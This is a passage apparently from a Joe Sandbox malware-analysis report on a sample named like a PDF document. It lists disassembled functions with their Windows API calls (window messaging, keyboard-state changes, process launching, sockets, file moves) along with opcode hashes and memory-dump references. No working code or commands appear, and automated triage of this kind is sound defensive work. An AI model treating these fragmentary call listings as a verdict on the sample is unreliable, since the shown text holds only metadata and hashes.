                                                            • ShowWindow.USER32(00000003,00000000), ref: 0017DA43
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0017DA68
                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 0017DA8B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                            • String ID:
                                                            • API String ID: 1211466189-0
                                                            • Opcode ID: 68f28173376999e8eda37c4c9f2c34feda6a5c12afae6d6241ced0e833501a8a
                                                            • Instruction ID: dcffead6069332d8d414f26a1dcd68252c05546e95d491cb80c0855c4b89780b
                                                            • Opcode Fuzzy Hash: 68f28173376999e8eda37c4c9f2c34feda6a5c12afae6d6241ced0e833501a8a
                                                            • Instruction Fuzzy Hash: BCB19971600219EBDF18CF68D985BAD7BB1BF48710F09C069ED889B295D734A990CB50
                                                            Function 000F2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 000F2ACF
                                                            • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000,000000FF), ref: 000F2B17
                                                            • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 0012C46A
                                                            • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0012C417,00000004,00000000,00000000,00000000), ref: 0012C4D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: c6a2e82cee354fcd88434815d4faa87e867272e2b981e19fae1418b9eaf21e12
                                                            • Instruction ID: fa58281a515144e52942e3eacb19ef9f2e07fe3d1026dfd9ed9f1b505223e4b8
                                                            • Opcode Fuzzy Hash: c6a2e82cee354fcd88434815d4faa87e867272e2b981e19fae1418b9eaf21e12
                                                            • Instruction Fuzzy Hash: 05411730208AC89BC7799B29DCA877F7BE2AB95300F15841DE34B86D60C7759882E752
                                                            Function 00157368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0015737F
                                                              • Part of subcall function 00110FF6: std::exception::exception.LIBCMT ref: 0011102C
                                                              • Part of subcall function 00110FF6: __CxxThrowException@8.LIBCMT ref: 00111041
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 001573B6
                                                            • EnterCriticalSection.KERNEL32(?), ref: 001573D2
                                                            • _memmove.LIBCMT ref: 00157420
                                                            • _memmove.LIBCMT ref: 0015743D
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0015744C
                                                            • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00157461
                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00157480
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 256516436-0
                                                            • Opcode ID: d2275938d9b892356ee35fd8fb8cd3835c4e8fe29c299531590d31b9a61d4a7f
                                                            • Instruction ID: 4f0b4093335a0edf5f12afd36ebce2aae9dbabe2f6893d5eb18dd1400f49320f
                                                            • Opcode Fuzzy Hash: d2275938d9b892356ee35fd8fb8cd3835c4e8fe29c299531590d31b9a61d4a7f
                                                            • Instruction Fuzzy Hash: BE316E31D04205EBCB10DF64DC86AAFBB78FF49710B1441B9FD049B246DB709A95CBA0
                                                            Function 00176442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DeleteObject.GDI32(00000000), ref: 0017645A
                                                            • GetDC.USER32(00000000), ref: 00176462
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0017646D
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00176479
                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001764B5
                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001764C6
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00179299,?,?,000000FF,00000000,?,000000FF,?), ref: 00176500
                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00176520
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                            • String ID:
                                                            • API String ID: 3864802216-0
                                                            • Opcode ID: 86df129d4926db30718a64c15734e4451ceaea5d384386d0430dcff0da476a3c
                                                            • Instruction ID: 926be2e1d918155ef9b7134084d4c3b1524b6f379eccf7105dbe0c8f19642aec
                                                            • Opcode Fuzzy Hash: 86df129d4926db30718a64c15734e4451ceaea5d384386d0430dcff0da476a3c
                                                            • Instruction Fuzzy Hash: 6F315C76201614AFEB118F50CC8AFEB3BA9EB09761F044069FE089A291D7759C82CB64
                                                            Function 0014C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID:
                                                            • API String ID: 2931989736-0
                                                            • Opcode ID: 095fff11e4d44caf0d9b99ba9ff37789a3974519f938803077c1eb3ef88fbcfb
                                                            • Instruction ID: 21e790a57bf192bcfa9f5019e67bb4624b833b1d8ca69ad632e325b2bb88fe5e
                                                            • Opcode Fuzzy Hash: 095fff11e4d44caf0d9b99ba9ff37789a3974519f938803077c1eb3ef88fbcfb
                                                            • Instruction Fuzzy Hash: 4021A475B02205BBD699B5218D42FFB779CAF307A4B084030FE05972A2E7A2DE11C6E5
                                                            Function 0015ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                              • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
                                                            • _wcstok.LIBCMT ref: 0015EEFF
                                                            • _wcscpy.LIBCMT ref: 0015EF8E
                                                            • _memset.LIBCMT ref: 0015EFC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                            • String ID: X
                                                            • API String ID: 774024439-3081909835
                                                            • Opcode ID: 3e8d5f0173a29351ff530be293f8813fc21d13a17934216fcc5949fd136919e5
                                                            • Instruction ID: 5aef2d3b7bcc3b463ba4447efe5ed056693c48272df06b80b6324bc8306322e8
                                                            • Opcode Fuzzy Hash: 3e8d5f0173a29351ff530be293f8813fc21d13a17934216fcc5949fd136919e5
                                                            • Instruction Fuzzy Hash: 54C16071508704DFC714EF24C881AAAB7E4EF85310F14492DF9A99B6A2DB70ED49DB82
                                                            Function 00166E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00166F14
                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00166F35
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166F48
                                                            • htons.WSOCK32(?,?,?,00000000,?), ref: 00166FFE
                                                            • inet_ntoa.WSOCK32(?), ref: 00166FBB
                                                              • Part of subcall function 0014AE14: _strlen.LIBCMT ref: 0014AE1E
                                                              • Part of subcall function 0014AE14: _memmove.LIBCMT ref: 0014AE40
                                                            • _strlen.LIBCMT ref: 00167058
                                                            • _memmove.LIBCMT ref: 001670C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                            • String ID:
                                                            • API String ID: 3619996494-0
                                                            • Opcode ID: 293b33ac16be589693547266814c55a73d29700d3f0499d16c9ec779d3e9181d
                                                            • Instruction ID: 1010986a127ed3aa7efd11dc3fbf36ba40cce9f721519dbee6f90fd47afa74f0
                                                            • Opcode Fuzzy Hash: 293b33ac16be589693547266814c55a73d29700d3f0499d16c9ec779d3e9181d
                                                            • Instruction Fuzzy Hash: E781E131508304ABD714EF24CC82FBBB7A9AF84718F14491CF6159B2E2DB71AD41CBA2
                                                            Function 000F1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ba37319a23af34aad72c1411d9fe2538408dfa8a7f1f3776b95d3795f378799
                                                            • Instruction ID: dc22dd030c9a3901695ecf6980081281eb93f06160fe51c4301cfe5c75e775cf
                                                            • Opcode Fuzzy Hash: 3ba37319a23af34aad72c1411d9fe2538408dfa8a7f1f3776b95d3795f378799
                                                            • Instruction Fuzzy Hash: AF717B70904119EFCB14CF98CC88AFEBBB9FF85314F108159FA15AA651C734AA52DBA0
                                                            Function 0017B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindow.USER32(00E95A00), ref: 0017B6A5
                                                            • IsWindowEnabled.USER32(00E95A00), ref: 0017B6B1
                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0017B795
                                                            • SendMessageW.USER32(00E95A00,000000B0,?,?), ref: 0017B7CC
                                                            • IsDlgButtonChecked.USER32(?,?), ref: 0017B809
                                                            • GetWindowLongW.USER32(00E95A00,000000EC), ref: 0017B82B
                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0017B843
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                            • String ID:
                                                            • API String ID: 4072528602-0
                                                            • Opcode ID: 4238b7cb1e9ebc45c9d82c4a9a01d547bfec791dee29c6d0ad4d73d002baa5ed
                                                            • Instruction ID: 2a051cff7bacc6683ead7d8bdabab318ec487e6621fc0f1c9a1f25c7ebaa92f1
                                                            • Opcode Fuzzy Hash: 4238b7cb1e9ebc45c9d82c4a9a01d547bfec791dee29c6d0ad4d73d002baa5ed
                                                            • Instruction Fuzzy Hash: 42718D74608204AFDB289F64C8E4FFA7BB9FF59300F148069FA5D972A1C731A981CB50
                                                            Function 0016F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0016F75C
                                                            • _memset.LIBCMT ref: 0016F825
                                                            • ShellExecuteExW.SHELL32(?), ref: 0016F86A
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                              • Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9
                                                            • GetProcessId.KERNEL32(00000000), ref: 0016F8E1
                                                            • CloseHandle.KERNEL32(00000000), ref: 0016F910
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                            • String ID: @
                                                            • API String ID: 3522835683-2766056989
                                                            • Opcode ID: 25d2b486ef299b1ef71b681700fcc68bb0d2120d3493c5c735f085a3d34484c3
                                                            • Instruction ID: d657bd50a817aac3a21dba114ea486ab79670d4beb8e4f2ac2a7d363d4e83a44
                                                            • Opcode Fuzzy Hash: 25d2b486ef299b1ef71b681700fcc68bb0d2120d3493c5c735f085a3d34484c3
                                                            • Instruction Fuzzy Hash: 4261BE75A00619DFCF14EF54D880AAEBBF5FF48310B15846DE84AAB752CB30AD52CB90
                                                            Function 0015145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0015149C
                                                            • GetKeyboardState.USER32(?), ref: 001514B1
                                                            • SetKeyboardState.USER32(?), ref: 00151512
                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00151540
                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0015155F
                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 001515A5
                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001515C8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 993edbe01a2218f55ffedd243192d28f1e5b4fba8a9bf2c2d3f04a392b6ce18d
                                                            • Instruction ID: 805bbcc7e80c6d5f91ab078eae3f5f02eac49b11de9d2657fd1836f80d401e59
                                                            • Opcode Fuzzy Hash: 993edbe01a2218f55ffedd243192d28f1e5b4fba8a9bf2c2d3f04a392b6ce18d
                                                            • Instruction Fuzzy Hash: 8E5102A06143D5BEFB335234CC45BBA7EA95B46306F088589E9E54D8C2D3E4DCC8D750
                                                            Function 00151276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(00000000), ref: 001512B5
                                                            • GetKeyboardState.USER32(?), ref: 001512CA
                                                            • SetKeyboardState.USER32(?), ref: 0015132B
                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00151357
                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00151374
                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001513B8
                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001513D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessagePost$KeyboardState$Parent
                                                            • String ID:
                                                            • API String ID: 87235514-0
                                                            • Opcode ID: 7d4de2e3996caf107023d88ca317e678cb2601edcd65ed48d5a0946d17553c90
                                                            • Instruction ID: b602bb6843df4a0efef660b37f62c320150b59f583aae48ace538efd8489cfff
                                                            • Opcode Fuzzy Hash: 7d4de2e3996caf107023d88ca317e678cb2601edcd65ed48d5a0946d17553c90
                                                            • Instruction Fuzzy Hash: D35115A05446D5BDFB3387248C55BBA7FA96B06312F088489E9F84ECC2D394AC8CD750
                                                            Function 0015589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$LocalTime
                                                            • String ID:
                                                            • API String ID: 2945705084-0
                                                            • Opcode ID: c0fa02b28b1891a036ba8af794f7c64d9916b4ef88560d90ff7bfcb63aca7849
                                                            • Instruction ID: 91d59e9ea690d263f25c75b9452ff98c3f90c241eb8d6afa8ad0ebbcca0a4a71
                                                            • Opcode Fuzzy Hash: c0fa02b28b1891a036ba8af794f7c64d9916b4ef88560d90ff7bfcb63aca7849
                                                            • Instruction Fuzzy Hash: E041C465C20128B6CB14FBF48C869CFB3A89F15710F508462F928E3121F734E794C7A5
                                                            Function 001538AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001538D3,?), ref: 001548C7
                                                              • Part of subcall function 001548AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001538D3,?), ref: 001548E0
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 001538F3
                                                            • _wcscmp.LIBCMT ref: 0015390F
                                                            • MoveFileW.KERNEL32(?,?), ref: 00153927
                                                            • _wcscat.LIBCMT ref: 0015396F
                                                            • SHFileOperationW.SHELL32(?), ref: 001539DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 1377345388-1173974218
                                                            • Opcode ID: f88b12c98aeb7b2696ba59f72063381ec325f81a5e8bf0d6956841537e90affe
                                                            • Instruction ID: 7e174b5ac4a0251594cd3350d3bab7da26764a36e34747dfc51a00f759d97c97
                                                            • Opcode Fuzzy Hash: f88b12c98aeb7b2696ba59f72063381ec325f81a5e8bf0d6956841537e90affe
                                                            • Instruction Fuzzy Hash: E4417EB140C3849EC755EF64C4819EFB7E8AF98385F00192EB8AAC7151EB74D69CC752
                                                            Function 00177500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00177519
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001775C0
                                                            • IsMenu.USER32(?), ref: 001775D8
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00177620
                                                            • DrawMenuBar.USER32 ref: 00177633
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                            • String ID: 0
                                                            • API String ID: 3866635326-4108050209
                                                            • Opcode ID: 1af526db51e930fcfaee582c7a6698a76e54e39d01cda3bafa50f58a267a1b65
                                                            • Instruction ID: 272d712f10a712f5e746f591f3d2c5b51ea2eab26c63379d42878a1a2b8e3f8d
                                                            • Opcode Fuzzy Hash: 1af526db51e930fcfaee582c7a6698a76e54e39d01cda3bafa50f58a267a1b65
                                                            • Instruction Fuzzy Hash: 61411A75A04609EFDB10DF54D884E9ABBF9FF08314F048129FA5997290D730AD91CF90
